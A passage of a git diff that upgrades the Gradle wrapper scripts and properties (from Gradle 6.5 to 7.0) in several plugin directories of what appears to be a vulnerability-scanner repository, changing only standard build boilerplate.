b/doyensec/detectors/kubernetes_rce_via_open_access/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/doyensec/detectors/kubernetes_rce_via_open_access/gradlew.bat b/doyensec/detectors/kubernetes_rce_via_open_access/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/doyensec/detectors/kubernetes_rce_via_open_access/gradlew.bat +++ b/doyensec/detectors/kubernetes_rce_via_open_access/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/doyensec/detectors/selenium_grid_rce_via_exposed_server/gradle/wrapper/gradle-wrapper.properties b/doyensec/detectors/selenium_grid_rce_via_exposed_server/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/doyensec/detectors/selenium_grid_rce_via_exposed_server/gradle/wrapper/gradle-wrapper.properties +++ b/doyensec/detectors/selenium_grid_rce_via_exposed_server/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/examples/example_calling_command/gradle/wrapper/gradle-wrapper.jar b/examples/example_calling_command/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/examples/example_calling_command/gradle/wrapper/gradle-wrapper.jar and b/examples/example_calling_command/gradle/wrapper/gradle-wrapper.jar differ diff --git a/examples/example_calling_command/gradle/wrapper/gradle-wrapper.properties b/examples/example_calling_command/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/examples/example_calling_command/gradle/wrapper/gradle-wrapper.properties +++ b/examples/example_calling_command/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/examples/example_calling_command/gradlew b/examples/example_calling_command/gradlew index fbd7c5158..1aa94a426 100755 --- a/examples/example_calling_command/gradlew +++ b/examples/example_calling_command/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/examples/example_calling_command/gradlew.bat b/examples/example_calling_command/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/examples/example_calling_command/gradlew.bat +++ b/examples/example_calling_command/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.jar b/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.jar and b/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.jar differ diff --git 